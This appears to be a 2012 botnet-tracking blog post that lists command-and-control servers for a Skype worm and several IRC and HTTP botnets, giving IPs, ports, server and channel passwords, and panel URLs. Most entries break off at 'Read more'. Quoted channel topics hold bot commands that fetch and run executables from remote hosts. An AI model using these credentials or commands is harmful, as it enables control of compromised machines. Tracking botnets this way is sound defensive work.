Note: New domains are at the bottom of the post This is the skype “worm” that is in the news right now Articles: http://www.techspot.com/news/50443-dorkbot-worm-spreading-via-skype-installs-nasty-ransomware.html http://news.cnet.com/8301-1009_3-57528353-83/worm-spreading-on-skype-im-installs-ransomware/ http://techcrunch.com/2012/10/08/ransomware-worm-now-spreading-on-skype/ http://www.forbes.com/sites/adriankingsleyhughes/2012/10/08/ransomware-worm-spreading-via-skype/ http://countermeasures.trendmicro.eu/skype-worm-spreading-fast/ Resolved venus.timeinfo.pl to 63.223.107.62, 176.9.192.131, 213.165.71.142, 217.160.108.147, 213.165.71.153, 87.106.98.157, 74.208.112.178 Server: venus.timeinfo.pl Port: 1863 Password: 24r34t SSL is needed to connect, accept the invalid certificate Authhost: bossmanRead more...
b4buj4ym0d3m.nl.ai (Aryan irc botnet hosted by Canada Montreal Ovh Hosting Inc).
Resolved b4buj4ym0d3m.nl.ai to 198.27.119.91 Server: b4buj4ym0d3m.nl.ai Port: 6969 Channel: #Aryan# Channel password: Aryan * Topic for #Aryan# is: @Botkill * Topic for #Aryan# set by God at Mon Oct 08 01:09:13 2012 No weed MOTD for this one. Hosting infos: http://whois.domaintools.com/198.27.119.91
lucasbaby.no-ip.info (Irc botnets hosted by Canada Montreal Ovh Hosting Inc.)
Resolved lucasbaby.no-ip.info to 142.4.203.95 Server: lucasbaby.no-ip.info Port: 6969 Channel: #karmie# Channel password: 1234 Nick: [USA|XP|gjetth] Topic for #karmie# is: @dl 1 hxxp://dl.dropbox.com/u/81040225/raw_out.exe Topic for #karmie# set by God at Sun Oct 07 13:42:09 2012 Opers: [Boss] (Anxiety@HaZe.GoV): Anxiety [Boss] ~#karmie# [Boss] irc.HaZe.GoV :HaZeNet [Boss] idle 12:09:34, signon: Mon Oct 08 00:16:30 [Boss] End of WHOISRead more...
123.gets-it.net (Ganja ircbot hosted by United States St. Louis Hosting Solutions International Inc)
Resolved 123.gets-it.net to 69.64.62.151 Server: 123.gets-it.net Port: 6697 * Current Local Users: 34 Max: 40 * Current Global Users: 34 Max: 40 Channel: #Ganja * Topic for #Ganja is: DO NOT USE THE SPEEDTEST COMMAND! * Topic for #Ganja set by Anxiety at Sat Oct 06 02:54:30 2012 Opers: * [Anxiety] (Anxiety@Test-5D47311C.bchsia.telus.net): Anxiety * [Anxiety]Read more...
50.7.239.180 (Rage bots hosted by Czech Republic Zlin Fdcservers.net)
Server: 50.7.239.180 Port: 7777 Channel: #rage * Topic for #rage is: .b0tk1ller 30 .p2p .rarworm .xpl 75 1 75.x.x.x 3 1 76.x.x.x * Topic for #rage set by cyberthrill at Wed Oct 03 13:55:03 2012 Nick format: L0v3|fQrHrWbarp Opers: * [BGChaser] (Ares@sab-5E6EA00F.telnet.bg): Ares * [BGChaser] @#rinfo @#binfo #rscan @#rage @#bkiller #b * [BGChaser] 50.7.239.180 :ServerRead more...
casinovegas.mobi (voip scanning botnet hosted by United States Missoula Sharktech)
I found this recently and though it was interesting enough to post. It’s a http controlled botnet used to scan for voip servers. Malware actionsTells the C&C server it has installed208.98.52.163/90/getip.php?action=liveRequests an ip segement to scan208.98.52.163/90/getip.php?action=getDownloads and installs python (Needed for the scanner)hxxp://208.98.52.163/90/files/python-2.7.2.msiIP range to be scanned is confirmed208.98.52.163/90/insert.php?action=online&computer=USER-PC&range=95.211.169.45-95.211.199.255Unrar utility is downloadedhxxp://208.98.52.163/90/files/UnRAR.exeScanner is downloadedhxxp://208.98.52.163/90/files/pack.rarThe malwareRead more...
ns3.captain-packet.net(irc botnet hosted in United States Washington Psinet Inc).
Resolved : [ns3.captain-packet.net] To [154.35.64.24] Remote Host Port Number ns3.captain-packet.net 3900 PASS zomg NICK banzlUSER ypawhj 0 0 :banzlUSERHOST banzlMODE banzl -x+iBJOIN ###bye### byeeeeeNICK pfyfxdUSER bagjsml 0 0 :pfyfxdUSERHOST pfyfxdMODE pfyfxd -x+iBNICK jyptraxUSER xncqm 0 0 :jyptraxUSERHOST jyptraxMODE jyptrax -x+iBNICK peajiUSER etngec 0 0 :peajiUSERHOSTRead more...
crysis4.net (Andromeda http bot hosted by Ukraine Ukrainian Internet Names Center Ltd)
Resolved crysis4.net to 91.231.84.114 Gate url: http://crysis4.net/knockout/image.php Login url: http://crysis4.net/knockout/index.php Rootkit plugin: http://crysis4.net/test/r.pack Hosting infos: http://whois.domaintools.com/91.231.84.114
irc.whhcd.info(irc botnet hosted in France Roubaix Ovh Sas)
Resolved : [irc.whhcd.info] To [46.105.36.229]Resolved : [irc.whhcd.info] To [176.31.33.45]Resolved : [irc.whhcd.info] To [5.39.44.120] Local users: Current Local Users: 63 Max: 286Global users: Current Global Users: 254 Max: 2003 Server Port irc.whhcd.info 6667 NICK h{UNK|x64}4927137BUSER UserName COMPUTERNAME .Read more...
tut0r1allsvu.info (ngr botnet hosted by United States Elk Grove Village Foroquimica Sl)
Resolved tut0r1allsvu.info to 75.127.10.3 Server: tut0r1allsvu.info Port: 8059 Password:ocx Channel: ##h4n Channel password: shell3 * Topic for ##h4n is: -up hxxp://www.premiersportsgroup.co/utily.exe 96E0E5E5861397EF644FA006BB888956 | -s * Topic for ##h4n set by Ko0l at Tue Oct 02 05:13:49 2012 Redirecting Colombian bots for pharming * Topic for #CO is: -mdns http://www.ellegadodelleon.com.ar/wp-content/it.txt * Topic for #CO set byRead more...